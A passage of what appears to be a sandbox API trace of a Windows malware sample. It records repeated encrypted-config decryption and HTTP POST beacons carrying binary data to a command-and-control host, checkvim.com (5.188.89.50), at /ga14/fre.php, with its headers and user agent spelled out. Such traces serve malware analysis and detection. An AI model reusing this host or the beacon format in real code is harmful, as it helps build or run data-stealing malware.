dwFlags=0x0) returned 1 [0261.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.413] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.413] GetProcessHeap () returned 0x840000 [0261.413] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0261.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.418] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0261.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.419] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0261.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0261.947] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0261.947] GetProcessHeap () returned 0x840000 [0261.947] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0261.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0261.948] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0261.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0261.948] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0261.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0261.949] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0261.949] GetProcessHeap () returned 0x840000 [0261.949] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713d0 [0261.949] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0261.951] GetProcessHeap () returned 0x840000 [0261.951] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c98 [0261.952] socket (af=2, type=1, protocol=6) returned 0x3c0 [0261.952] connect (s=0x3c0, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0262.032] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0262.037] GetProcessHeap () returned 0x840000 [0262.037] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0262.042] GetProcessHeap () returned 0x840000 [0262.042] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0262.043] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0262.044] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0262.044] GetProcessHeap () returned 0x840000 [0262.044] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0262.044] GetProcessHeap () returned 0x840000 [0262.047] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0262.047] GetProcessHeap () returned 0x840000 [0262.047] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fdd0 [0262.047] GetProcessHeap () returned 0x840000 [0262.047] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0262.048] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0262.049] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0262.049] GetProcessHeap () returned 0x840000 [0262.049] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0262.049] GetProcessHeap () returned 0x840000 [0262.049] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0262.049] send (s=0x3c0, buf=0x873a58*, len=237, flags=0) returned 237 [0262.050] send (s=0x3c0, buf=0x87eb58*, len=159, flags=0) returned 159 [0262.050] GetProcessHeap () returned 0x840000 [0262.050] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0262.050] recv (in: s=0x3c0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0262.414] GetProcessHeap () returned 0x840000 [0262.414] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0262.414] GetProcessHeap () returned 0x840000 [0262.414] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0262.414] GetProcessHeap () returned 0x840000 [0262.414] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0262.414] GetProcessHeap () returned 0x840000 [0262.414] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0262.414] closesocket (s=0x3c0) returned 0 [0262.415] GetProcessHeap () returned 0x840000 [0262.415] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c98 | out: hHeap=0x840000) returned 1 [0262.415] GetProcessHeap () returned 0x840000 [0262.415] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0262.415] GetProcessHeap () returned 0x840000 [0262.415] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0262.415] GetProcessHeap () returned 0x840000 [0262.415] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713d0 | out: hHeap=0x840000) returned 1 [0262.415] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xf9c) returned 0x3c0 [0262.419] Sleep (dwMilliseconds=0xea60) [0262.481] GetProcessHeap () returned 0x840000 [0262.481] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0262.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.484] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0262.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.497] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0262.504] GetProcessHeap () returned 0x840000 [0262.504] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0262.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.505] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9f0) returned 1 [0262.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.505] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0262.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.506] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.506] GetProcessHeap () returned 0x840000 [0262.507] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0262.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.508] CryptDecrypt (in: hKey=0x87e9f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0262.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.513] CryptDestroyKey (hKey=0x87e9f0) returned 1 [0262.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.514] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0262.514] GetProcessHeap () returned 0x840000 [0262.514] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0262.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0262.515] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0262.515] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0262.516] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0262.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0262.517] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0262.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0262.517] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0262.517] GetProcessHeap () returned 0x840000 [0262.517] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0262.517] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0262.518] GetProcessHeap () returned 0x840000 [0262.518] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0262.518] GetProcessHeap () returned 0x840000 [0262.518] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0262.518] GetProcessHeap () returned 0x840000 [0262.518] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0262.518] GetProcessHeap () returned 0x840000 [0262.518] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0262.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.519] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0262.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.536] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0262.556] GetProcessHeap () returned 0x840000 [0262.556] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0262.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.557] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0262.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.557] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0262.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.558] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.558] GetProcessHeap () returned 0x840000 [0262.558] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0262.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.561] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0262.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.565] CryptDestroyKey (hKey=0x87e930) returned 1 [0262.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0262.566] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0262.566] GetProcessHeap () returned 0x840000 [0262.566] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0262.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0262.567] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0262.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0262.568] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0262.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0262.569] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0262.569] GetProcessHeap () returned 0x840000 [0262.569] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0262.569] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0262.600] GetProcessHeap () returned 0x840000 [0262.600] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0262.600] socket (af=2, type=1, protocol=6) returned 0x3c4 [0262.600] connect (s=0x3c4, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0262.678] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0262.678] GetProcessHeap () returned 0x840000 [0262.678] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f820 [0262.678] GetProcessHeap () returned 0x840000 [0262.678] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0262.679] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0262.680] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0262.680] GetProcessHeap () returned 0x840000 [0262.680] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0262.680] GetProcessHeap () returned 0x840000 [0262.680] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0262.680] GetProcessHeap () returned 0x840000 [0262.680] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7a0 [0262.680] GetProcessHeap () returned 0x840000 [0262.680] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0262.681] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0262.682] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0262.682] GetProcessHeap () returned 0x840000 [0262.682] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0262.682] GetProcessHeap () returned 0x840000 [0262.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0262.682] send (s=0x3c4, buf=0x873a58*, len=237, flags=0) returned 237 [0262.682] send (s=0x3c4, buf=0x87eb58*, len=159, flags=0) returned 159 [0262.683] GetProcessHeap () returned 0x840000 [0262.683] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0262.683] recv (in: s=0x3c4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0263.070] GetProcessHeap () returned 0x840000 [0263.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0263.072] GetProcessHeap () returned 0x840000 [0263.072] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0263.072] GetProcessHeap () returned 0x840000 [0263.072] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0263.072] GetProcessHeap () returned 0x840000 [0263.072] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f820 | out: hHeap=0x840000) returned 1 [0263.072] closesocket (s=0x3c4) returned 0 [0263.074] GetProcessHeap () returned 0x840000 [0263.074] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0263.074] GetProcessHeap () returned 0x840000 [0263.074] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0263.074] GetProcessHeap () returned 0x840000 [0263.074] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0263.074] GetProcessHeap () returned 0x840000 [0263.074] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0263.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1128) returned 0x3c4 [0263.078] Sleep (dwMilliseconds=0xea60) [0263.079] GetProcessHeap () returned 0x840000 [0263.079] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f908 [0263.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.081] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0263.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.089] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0263.101] GetProcessHeap () returned 0x840000 [0263.101] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0263.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.102] CryptImportKey (in: hProv=0x86fce8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0263.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.102] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0263.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.103] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.103] GetProcessHeap () returned 0x840000 [0263.103] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0263.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.104] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f908, pdwDataLen=0x19f9a4 | out: pbData=0x87f908, pdwDataLen=0x19f9a4) returned 1 [0263.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.105] CryptDestroyKey (hKey=0x87e270) returned 1 [0263.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.106] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0263.106] GetProcessHeap () returned 0x840000 [0263.106] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0263.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.107] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0263.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.108] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0263.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.109] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0263.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.110] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0263.110] GetProcessHeap () returned 0x840000 [0263.110] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0263.110] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0263.110] GetProcessHeap () returned 0x840000 [0263.111] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0263.111] GetProcessHeap () returned 0x840000 [0263.111] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0263.111] GetProcessHeap () returned 0x840000 [0263.111] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f908 | out: hHeap=0x840000) returned 1 [0263.111] GetProcessHeap () returned 0x840000 [0263.111] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0263.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.112] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0263.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.117] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0263.123] GetProcessHeap () returned 0x840000 [0263.123] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0263.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.124] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e830) returned 1 [0263.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.125] CryptSetKeyParam (hKey=0x87e830, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0263.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.126] CryptSetKeyParam (hKey=0x87e830, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.126] GetProcessHeap () returned 0x840000 [0263.126] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0263.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.127] CryptDecrypt (in: hKey=0x87e830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0263.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.128] CryptDestroyKey (hKey=0x87e830) returned 1 [0263.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0263.129] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0263.129] GetProcessHeap () returned 0x840000 [0263.129] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0263.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.130] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0263.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.131] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0263.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0263.132] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0263.132] GetProcessHeap () returned 0x840000 [0263.132] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0263.132] getaddrinfo (in: 